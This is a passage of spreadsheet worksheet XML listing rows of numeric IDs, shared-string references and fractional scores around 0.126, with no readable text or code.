        <v>12971.0</v>
      </c>
      <c r="B20033" s="2">
        <v>3.2567313E7</v>
      </c>
      <c r="C20033" s="2" t="s">
        <v>19314</v>
      </c>
      <c r="D20033" s="2">
        <v>1.0</v>
      </c>
      <c r="E20033" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20033" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="20034" ht="15.75" customHeight="1">
      <c r="A20034" s="1">
        <v>533.0</v>
      </c>
      <c r="B20034" s="2">
        <v>1.8515151E7</v>
      </c>
      <c r="C20034" s="2" t="s">
        <v>19315</v>
      </c>
      <c r="D20034" s="2">
        <v>1.0</v>
      </c>
      <c r="E20034" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20034" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20035" ht="15.75" customHeight="1">
      <c r="A20035" s="1">
        <v>538.0</v>
      </c>
      <c r="B20035" s="2">
        <v>1.8627021E7</v>
      </c>
      <c r="C20035" s="2" t="s">
        <v>19316</v>
      </c>
      <c r="D20035" s="2">
        <v>1.0</v>
      </c>
      <c r="E20035" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20035" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20036" ht="15.75" customHeight="1">
      <c r="A20036" s="1">
        <v>9127.0</v>
      </c>
      <c r="B20036" s="2">
        <v>5.5226158E7</v>
      </c>
      <c r="C20036" s="2" t="s">
        <v>19317</v>
      </c>
      <c r="D20036" s="2">
        <v>1.0</v>
      </c>
      <c r="E20036" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20036" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20037" ht="15.75" customHeight="1">
      <c r="A20037" s="1">
        <v>14624.0</v>
      </c>
      <c r="B20037" s="2">
        <v>4.0300451E7</v>
      </c>
      <c r="C20037" s="2" t="s">
        <v>19318</v>
      </c>
      <c r="D20037" s="2">
        <v>1.0</v>
      </c>
      <c r="E20037" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20037" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20038" ht="15.75" customHeight="1">
      <c r="A20038" s="1">
        <v>16583.0</v>
      </c>
      <c r="B20038" s="2">
        <v>4.6918734E7</v>
      </c>
      <c r="C20038" s="2" t="s">
        <v>19319</v>
      </c>
      <c r="D20038" s="2">
        <v>1.0</v>
      </c>
      <c r="E20038" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20038" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20039" ht="15.75" customHeight="1">
      <c r="A20039" s="1">
        <v>18861.0</v>
      </c>
      <c r="B20039" s="2">
        <v>5.3995703E7</v>
      </c>
      <c r="C20039" s="2" t="s">
        <v>19320</v>
      </c>
      <c r="D20039" s="2">
        <v>1.0</v>
      </c>
      <c r="E20039" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20039" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20040" ht="15.75" customHeight="1">
      <c r="A20040" s="1">
        <v>20064.0</v>
      </c>
      <c r="B20040" s="2">
        <v>8530195.0</v>
      </c>
      <c r="C20040" s="2" t="s">
        <v>19321</v>
      </c>
      <c r="D20040" s="2">
        <v>1.0</v>
      </c>
      <c r="E20040" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20040" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="20041" ht="15.75" customHeight="1">
      <c r="A20041" s="1">
        <v>7604.0</v>
      </c>
      <c r="B20041" s="2">
        <v>5.164905E7</v>
      </c>
      <c r="C20041" s="2" t="s">
        <v>19322</v>
      </c>
      <c r="D20041" s="2">
        <v>1.0</v>
      </c>
      <c r="E20041" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20041" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="20042" ht="15.75" customHeight="1">
      <c r="A20042" s="1">
        <v>7792.0</v>
      </c>
      <c r="B20042" s="2">
        <v>5.2201484E7</v>
      </c>
      <c r="C20042" s="2" t="s">
        <v>19323</v>
      </c>
      <c r="D20042" s="2">
        <v>1.0</v>
      </c>
      <c r="E20042" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20042" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="20043" ht="15.75" customHeight="1">
      <c r="A20043" s="1">
        <v>535.0</v>
      </c>
      <c r="B20043" s="2">
        <v>1.8551293E7</v>
      </c>
      <c r="C20043" s="2" t="s">
        <v>19324</v>
      </c>
      <c r="D20043" s="2">
        <v>1.0</v>
      </c>
      <c r="E20043" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20043" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20044" ht="15.75" customHeight="1">
      <c r="A20044" s="1">
        <v>1819.0</v>
      </c>
      <c r="B20044" s="2">
        <v>2.9263966E7</v>
      </c>
      <c r="C20044" s="2" t="s">
        <v>19325</v>
      </c>
      <c r="D20044" s="2">
        <v>1.0</v>
      </c>
      <c r="E20044" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20044" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20045" ht="15.75" customHeight="1">
      <c r="A20045" s="1">
        <v>4236.0</v>
      </c>
      <c r="B20045" s="2">
        <v>4.1787731E7</v>
      </c>
      <c r="C20045" s="2" t="s">
        <v>19326</v>
      </c>
      <c r="D20045" s="2">
        <v>1.0</v>
      </c>
      <c r="E20045" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20045" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20046" ht="15.75" customHeight="1">
      <c r="A20046" s="1">
        <v>4563.0</v>
      </c>
      <c r="B20046" s="2">
        <v>4.2720526E7</v>
      </c>
      <c r="C20046" s="2" t="s">
        <v>19327</v>
      </c>
      <c r="D20046" s="2">
        <v>1.0</v>
      </c>
      <c r="E20046" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20046" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20047" ht="15.75" customHeight="1">
      <c r="A20047" s="1">
        <v>4982.0</v>
      </c>
      <c r="B20047" s="2">
        <v>4.4123452E7</v>
      </c>
      <c r="C20047" s="2" t="s">
        <v>19328</v>
      </c>
      <c r="D20047" s="2">
        <v>1.0</v>
      </c>
      <c r="E20047" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20047" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20048" ht="15.75" customHeight="1">
      <c r="A20048" s="1">
        <v>5185.0</v>
      </c>
      <c r="B20048" s="2">
        <v>4.4783846E7</v>
      </c>
      <c r="C20048" s="2" t="s">
        <v>19329</v>
      </c>
      <c r="D20048" s="2">
        <v>1.0</v>
      </c>
      <c r="E20048" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20048" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20049" ht="15.75" customHeight="1">
      <c r="A20049" s="1">
        <v>6963.0</v>
      </c>
      <c r="B20049" s="2">
        <v>4.998173E7</v>
      </c>
      <c r="C20049" s="2" t="s">
        <v>19330</v>
      </c>
      <c r="D20049" s="2">
        <v>1.0</v>
      </c>
      <c r="E20049" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20049" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20050" ht="15.75" customHeight="1">
      <c r="A20050" s="1">
        <v>9354.0</v>
      </c>
      <c r="B20050" s="2">
        <v>5.5676224E7</v>
      </c>
      <c r="C20050" s="2" t="s">
        <v>19331</v>
      </c>
      <c r="D20050" s="2">
        <v>1.0</v>
      </c>
      <c r="E20050" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20050" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20051" ht="15.75" customHeight="1">
      <c r="A20051" s="1">
        <v>10373.0</v>
      </c>
      <c r="B20051" s="2">
        <v>7946244.0</v>
      </c>
      <c r="C20051" s="2" t="s">
        <v>19332</v>
      </c>
      <c r="D20051" s="2">
        <v>1.0</v>
      </c>
      <c r="E20051" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20051" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20052" ht="15.75" customHeight="1">
      <c r="A20052" s="1">
        <v>11525.0</v>
      </c>
      <c r="B20052" s="2">
        <v>2.2418007E7</v>
      </c>
      <c r="C20052" s="2" t="s">
        <v>19333</v>
      </c>
      <c r="D20052" s="2">
        <v>1.0</v>
      </c>
      <c r="E20052" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20052" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20053" ht="15.75" customHeight="1">
      <c r="A20053" s="1">
        <v>14169.0</v>
      </c>
      <c r="B20053" s="2">
        <v>3805131.0</v>
      </c>
      <c r="C20053" s="2" t="s">
        <v>19334</v>
      </c>
      <c r="D20053" s="2">
        <v>1.0</v>
      </c>
      <c r="E20053" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20053" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20054" ht="15.75" customHeight="1">
      <c r="A20054" s="1">
        <v>14369.0</v>
      </c>
      <c r="B20054" s="2">
        <v>3.8960493E7</v>
      </c>
      <c r="C20054" s="2" t="s">
        <v>19335</v>
      </c>
      <c r="D20054" s="2">
        <v>1.0</v>
      </c>
      <c r="E20054" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20054" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20055" ht="15.75" customHeight="1">
      <c r="A20055" s="1">
        <v>16534.0</v>
      </c>
      <c r="B20055" s="2">
        <v>4.6736413E7</v>
      </c>
      <c r="C20055" s="2" t="s">
        <v>19336</v>
      </c>
      <c r="D20055" s="2">
        <v>1.0</v>
      </c>
      <c r="E20055" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20055" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20056" ht="15.75" customHeight="1">
      <c r="A20056" s="1">
        <v>24838.0</v>
      </c>
      <c r="B20056" s="2">
        <v>1.2171726E7</v>
      </c>
      <c r="C20056" s="2" t="s">
        <v>19337</v>
      </c>
      <c r="D20056" s="2">
        <v>1.0</v>
      </c>
      <c r="E20056" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20056" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="20057" ht="15.75" customHeight="1">
      <c r="A20057" s="1">
        <v>9820.0</v>
      </c>
      <c r="B20057" s="2">
        <v>5.6624924E7</v>
      </c>
      <c r="C20057" s="2" t="s">
        <v>19338</v>
      </c>
      <c r="D20057" s="2">
        <v>1.0</v>
      </c>
      <c r="E20057" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20057" s="2">
        <v>0.1258790436005626</v>
      </c>
    </row>
    <row r="20058" ht="15.75" customHeight="1">
      <c r="A20058" s="1">
        <v>3099.0</v>
      </c>
      <c r="B20058" s="2">
        <v>3.6699831E7</v>
      </c>
      <c r="C20058" s="2" t="s">
        <v>19339</v>
      </c>
      <c r="D20058" s="2">
        <v>1.0</v>
      </c>
      <c r="E20058" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20058" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="20059" ht="15.75" customHeight="1">
      <c r="A20059" s="1">
        <v>5032.0</v>
      </c>
      <c r="B20059" s="2">
        <v>4.4262596E7</v>
      </c>
      <c r="C20059" s="2" t="s">
        <v>19340</v>
      </c>
      <c r="D20059" s="2">
        <v>1.0</v>
      </c>
      <c r="E20059" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20059" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="20060" ht="15.75" customHeight="1">
      <c r="A20060" s="1">
        <v>8722.0</v>
      </c>
      <c r="B20060" s="2">
        <v>5.4498496E7</v>
      </c>
      <c r="C20060" s="2" t="s">
        <v>19341</v>
      </c>
      <c r="D20060" s="2">
        <v>1.0</v>
      </c>
      <c r="E20060" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20060" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="20061" ht="15.75" customHeight="1">
      <c r="A20061" s="1">
        <v>10495.0</v>
      </c>
      <c r="B20061" s="2">
        <v>1.1298533E7</v>
      </c>
      <c r="C20061" s="2" t="s">
        <v>19342</v>
      </c>
      <c r="D20061" s="2">
        <v>1.0</v>
      </c>
      <c r="E20061" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20061" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="20062" ht="15.75" customHeight="1">
      <c r="A20062" s="1">
        <v>16997.0</v>
      </c>
      <c r="B20062" s="2">
        <v>4.8393041E7</v>
      </c>
      <c r="C20062" s="2" t="s">
        <v>19343</v>
      </c>
      <c r="D20062" s="2">
        <v>1.0</v>
      </c>
      <c r="E20062" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20062" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="20063" ht="15.75" customHeight="1">
      <c r="A20063" s="1">
        <v>815.0</v>
      </c>
      <c r="B20063" s="2">
        <v>2.1390882E7</v>
      </c>
      <c r="C20063" s="2" t="s">
        <v>19344</v>
      </c>
      <c r="D20063" s="2">
        <v>1.0</v>
      </c>
      <c r="E20063" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20063" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20064" ht="15.75" customHeight="1">
      <c r="A20064" s="1">
        <v>1778.0</v>
      </c>
      <c r="B20064" s="2">
        <v>2.9030947E7</v>
      </c>
      <c r="C20064" s="2" t="s">
        <v>19345</v>
      </c>
      <c r="D20064" s="2">
        <v>1.0</v>
      </c>
      <c r="E20064" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20064" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20065" ht="15.75" customHeight="1">
      <c r="A20065" s="1">
        <v>1886.0</v>
      </c>
      <c r="B20065" s="2">
        <v>2.9798052E7</v>
      </c>
      <c r="C20065" s="2" t="s">
        <v>19346</v>
      </c>
      <c r="D20065" s="2">
        <v>1.0</v>
      </c>
      <c r="E20065" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20065" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20066" ht="15.75" customHeight="1">
      <c r="A20066" s="1">
        <v>2029.0</v>
      </c>
      <c r="B20066" s="2">
        <v>3.0810716E7</v>
      </c>
      <c r="C20066" s="2" t="s">
        <v>19347</v>
      </c>
      <c r="D20066" s="2">
        <v>1.0</v>
      </c>
      <c r="E20066" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20066" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20067" ht="15.75" customHeight="1">
      <c r="A20067" s="1">
        <v>2241.0</v>
      </c>
      <c r="B20067" s="2">
        <v>3.2307419E7</v>
      </c>
      <c r="C20067" s="2" t="s">
        <v>19348</v>
      </c>
      <c r="D20067" s="2">
        <v>1.0</v>
      </c>
      <c r="E20067" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20067" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20068" ht="15.75" customHeight="1">
      <c r="A20068" s="1">
        <v>3096.0</v>
      </c>
      <c r="B20068" s="2">
        <v>3.6690438E7</v>
      </c>
      <c r="C20068" s="2" t="s">
        <v>19349</v>
      </c>
      <c r="D20068" s="2">
        <v>1.0</v>
      </c>
      <c r="E20068" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20068" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20069" ht="15.75" customHeight="1">
      <c r="A20069" s="1">
        <v>3835.0</v>
      </c>
      <c r="B20069" s="2">
        <v>4.0180659E7</v>
      </c>
      <c r="C20069" s="2" t="s">
        <v>19350</v>
      </c>
      <c r="D20069" s="2">
        <v>1.0</v>
      </c>
      <c r="E20069" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20069" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20070" ht="15.75" customHeight="1">
      <c r="A20070" s="1">
        <v>4033.0</v>
      </c>
      <c r="B20070" s="2">
        <v>4.1009233E7</v>
      </c>
      <c r="C20070" s="2" t="s">
        <v>19351</v>
      </c>
      <c r="D20070" s="2">
        <v>1.0</v>
      </c>
      <c r="E20070" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20070" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20071" ht="15.75" customHeight="1">
      <c r="A20071" s="1">
        <v>4803.0</v>
      </c>
      <c r="B20071" s="2">
        <v>4.3537872E7</v>
      </c>
      <c r="C20071" s="2" t="s">
        <v>19352</v>
      </c>
      <c r="D20071" s="2">
        <v>1.0</v>
      </c>
      <c r="E20071" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20071" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20072" ht="15.75" customHeight="1">
      <c r="A20072" s="1">
        <v>5040.0</v>
      </c>
      <c r="B20072" s="2">
        <v>4.4298908E7</v>
      </c>
      <c r="C20072" s="2" t="s">
        <v>19353</v>
      </c>
      <c r="D20072" s="2">
        <v>1.0</v>
      </c>
      <c r="E20072" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20072" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20073" ht="15.75" customHeight="1">
      <c r="A20073" s="1">
        <v>6842.0</v>
      </c>
      <c r="B20073" s="2">
        <v>4.9622755E7</v>
      </c>
      <c r="C20073" s="2" t="s">
        <v>19354</v>
      </c>
      <c r="D20073" s="2">
        <v>1.0</v>
      </c>
      <c r="E20073" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20073" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20074" ht="15.75" customHeight="1">
      <c r="A20074" s="1">
        <v>6957.0</v>
      </c>
      <c r="B20074" s="2">
        <v>4.9973199E7</v>
      </c>
      <c r="C20074" s="2" t="s">
        <v>19355</v>
      </c>
      <c r="D20074" s="2">
        <v>1.0</v>
      </c>
      <c r="E20074" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20074" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20075" ht="15.75" customHeight="1">
      <c r="A20075" s="1">
        <v>8773.0</v>
      </c>
      <c r="B20075" s="2">
        <v>5.458593E7</v>
      </c>
      <c r="C20075" s="2" t="s">
        <v>19356</v>
      </c>
      <c r="D20075" s="2">
        <v>1.0</v>
      </c>
      <c r="E20075" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20075" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20076" ht="15.75" customHeight="1">
      <c r="A20076" s="1">
        <v>8812.0</v>
      </c>
      <c r="B20076" s="2">
        <v>5.4630451E7</v>
      </c>
      <c r="C20076" s="2" t="s">
        <v>19357</v>
      </c>
      <c r="D20076" s="2">
        <v>1.0</v>
      </c>
      <c r="E20076" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20076" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20077" ht="15.75" customHeight="1">
      <c r="A20077" s="1">
        <v>9005.0</v>
      </c>
      <c r="B20077" s="2">
        <v>5.4974902E7</v>
      </c>
      <c r="C20077" s="2" t="s">
        <v>19358</v>
      </c>
      <c r="D20077" s="2">
        <v>1.0</v>
      </c>
      <c r="E20077" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20077" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20078" ht="15.75" customHeight="1">
      <c r="A20078" s="1">
        <v>9076.0</v>
      </c>
      <c r="B20078" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C20078" s="2" t="s">
        <v>19359</v>
      </c>
      <c r="D20078" s="2">
        <v>1.0</v>
      </c>
      <c r="E20078" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20078" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20079" ht="15.75" customHeight="1">
      <c r="A20079" s="1">
        <v>9497.0</v>
      </c>
      <c r="B20079" s="2">
        <v>5.5918858E7</v>
      </c>
      <c r="C20079" s="2" t="s">
        <v>19360</v>
      </c>
      <c r="D20079" s="2">
        <v>1.0</v>
      </c>
      <c r="E20079" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20079" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20080" ht="15.75" customHeight="1">
      <c r="A20080" s="1">
        <v>9572.0</v>
      </c>
      <c r="B20080" s="2">
        <v>5.605565E7</v>
      </c>
      <c r="C20080" s="2" t="s">
        <v>19361</v>
      </c>
      <c r="D20080" s="2">
        <v>1.0</v>
      </c>
      <c r="E20080" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20080" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20081" ht="15.75" customHeight="1">
      <c r="A20081" s="1">
        <v>11257.0</v>
      </c>
      <c r="B20081" s="2">
        <v>2.0584826E7</v>
      </c>
      <c r="C20081" s="2" t="s">
        <v>19362</v>
      </c>
      <c r="D20081" s="2">
        <v>1.0</v>
      </c>
      <c r="E20081" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20081" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20082" ht="15.75" customHeight="1">
      <c r="A20082" s="1">
        <v>12471.0</v>
      </c>
      <c r="B20082" s="2">
        <v>2.9423453E7</v>
      </c>
      <c r="C20082" s="2" t="s">
        <v>19363</v>
      </c>
      <c r="D20082" s="2">
        <v>1.0</v>
      </c>
      <c r="E20082" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20082" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20083" ht="15.75" customHeight="1">
      <c r="A20083" s="1">
        <v>14399.0</v>
      </c>
      <c r="B20083" s="2">
        <v>3.9174367E7</v>
      </c>
      <c r="C20083" s="2" t="s">
        <v>19364</v>
      </c>
      <c r="D20083" s="2">
        <v>1.0</v>
      </c>
      <c r="E20083" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20083" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20084" ht="15.75" customHeight="1">
      <c r="A20084" s="1">
        <v>14449.0</v>
      </c>
      <c r="B20084" s="2">
        <v>3.9372555E7</v>
      </c>
      <c r="C20084" s="2" t="s">
        <v>19365</v>
      </c>
      <c r="D20084" s="2">
        <v>1.0</v>
      </c>
      <c r="E20084" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20084" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20085" ht="15.75" customHeight="1">
      <c r="A20085" s="1">
        <v>14456.0</v>
      </c>
      <c r="B20085" s="2">
        <v>3.9432946E7</v>
      </c>
      <c r="C20085" s="2" t="s">
        <v>19366</v>
      </c>
      <c r="D20085" s="2">
        <v>1.0</v>
      </c>
      <c r="E20085" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20085" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20086" ht="15.75" customHeight="1">
      <c r="A20086" s="1">
        <v>15150.0</v>
      </c>
      <c r="B20086" s="2">
        <v>4.1964115E7</v>
      </c>
      <c r="C20086" s="2" t="s">
        <v>19367</v>
      </c>
      <c r="D20086" s="2">
        <v>1.0</v>
      </c>
      <c r="E20086" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20086" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20087" ht="15.75" customHeight="1">
      <c r="A20087" s="1">
        <v>15748.0</v>
      </c>
      <c r="B20087" s="2">
        <v>4.4118834E7</v>
      </c>
      <c r="C20087" s="2" t="s">
        <v>19368</v>
      </c>
      <c r="D20087" s="2">
        <v>1.0</v>
      </c>
      <c r="E20087" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20087" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20088" ht="15.75" customHeight="1">
      <c r="A20088" s="1">
        <v>15953.0</v>
      </c>
      <c r="B20088" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C20088" s="2" t="s">
        <v>19369</v>
      </c>
      <c r="D20088" s="2">
        <v>1.0</v>
      </c>
      <c r="E20088" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20088" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20089" ht="15.75" customHeight="1">
      <c r="A20089" s="1">
        <v>16681.0</v>
      </c>
      <c r="B20089" s="2">
        <v>4.7293097E7</v>
      </c>
      <c r="C20089" s="2" t="s">
        <v>19370</v>
      </c>
      <c r="D20089" s="2">
        <v>1.0</v>
      </c>
      <c r="E20089" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20089" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20090" ht="15.75" customHeight="1">
      <c r="A20090" s="1">
        <v>18235.0</v>
      </c>
      <c r="B20090" s="2">
        <v>5.2117416E7</v>
      </c>
      <c r="C20090" s="2" t="s">
        <v>19371</v>
      </c>
      <c r="D20090" s="2">
        <v>1.0</v>
      </c>
      <c r="E20090" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20090" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20091" ht="15.75" customHeight="1">
      <c r="A20091" s="1">
        <v>18473.0</v>
      </c>
      <c r="B20091" s="2">
        <v>5.2854217E7</v>
      </c>
      <c r="C20091" s="2" t="s">
        <v>19372</v>
      </c>
      <c r="D20091" s="2">
        <v>1.0</v>
      </c>
      <c r="E20091" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20091" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20092" ht="15.75" customHeight="1">
      <c r="A20092" s="1">
        <v>18688.0</v>
      </c>
      <c r="B20092" s="2">
        <v>5.3597174E7</v>
      </c>
      <c r="C20092" s="2" t="s">
        <v>19373</v>
      </c>
      <c r="D20092" s="2">
        <v>1.0</v>
      </c>
      <c r="E20092" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20092" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20093" ht="15.75" customHeight="1">
      <c r="A20093" s="1">
        <v>22014.0</v>
      </c>
      <c r="B20093" s="2">
        <v>2.9937525E7</v>
      </c>
      <c r="C20093" s="2" t="s">
        <v>19374</v>
      </c>
      <c r="D20093" s="2">
        <v>1.0</v>
      </c>
      <c r="E20093" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20093" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20094" ht="15.75" customHeight="1">
      <c r="A20094" s="1">
        <v>23224.0</v>
      </c>
      <c r="B20094" s="2">
        <v>5.2798431E7</v>
      </c>
      <c r="C20094" s="2" t="s">
        <v>19375</v>
      </c>
      <c r="D20094" s="2">
        <v>1.0</v>
      </c>
      <c r="E20094" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20094" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20095" ht="15.75" customHeight="1">
      <c r="A20095" s="1">
        <v>23399.0</v>
      </c>
      <c r="B20095" s="2">
        <v>5.5766506E7</v>
      </c>
      <c r="C20095" s="2" t="s">
        <v>19376</v>
      </c>
      <c r="D20095" s="2">
        <v>1.0</v>
      </c>
      <c r="E20095" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20095" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20096" ht="15.75" customHeight="1">
      <c r="A20096" s="1">
        <v>24627.0</v>
      </c>
      <c r="B20096" s="2">
        <v>1.1465969E7</v>
      </c>
      <c r="C20096" s="2" t="s">
        <v>19377</v>
      </c>
      <c r="D20096" s="2">
        <v>1.0</v>
      </c>
      <c r="E20096" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20096" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20097" ht="15.75" customHeight="1">
      <c r="A20097" s="1">
        <v>24814.0</v>
      </c>
      <c r="B20097" s="2">
        <v>1.2067599E7</v>
      </c>
      <c r="C20097" s="2" t="s">
        <v>19378</v>
      </c>
      <c r="D20097" s="2">
        <v>1.0</v>
      </c>
      <c r="E20097" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20097" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20098" ht="15.75" customHeight="1">
      <c r="A20098" s="1">
        <v>34212.0</v>
      </c>
      <c r="B20098" s="2">
        <v>2.9481975E7</v>
      </c>
      <c r="C20098" s="2" t="s">
        <v>19379</v>
      </c>
      <c r="D20098" s="2">
        <v>1.0</v>
      </c>
      <c r="E20098" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20098" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="20099" ht="15.75" customHeight="1">
      <c r="A20099" s="1">
        <v>4232.0</v>
      </c>
      <c r="B20099" s="2">
        <v>4.1764183E7</v>
      </c>
      <c r="C20099" s="2" t="s">
        <v>19380</v>
      </c>
      <c r="D20099" s="2">
        <v>1.0</v>
      </c>
      <c r="E20099" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20099" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="20100" ht="15.75" customHeight="1">
      <c r="A20100" s="1">
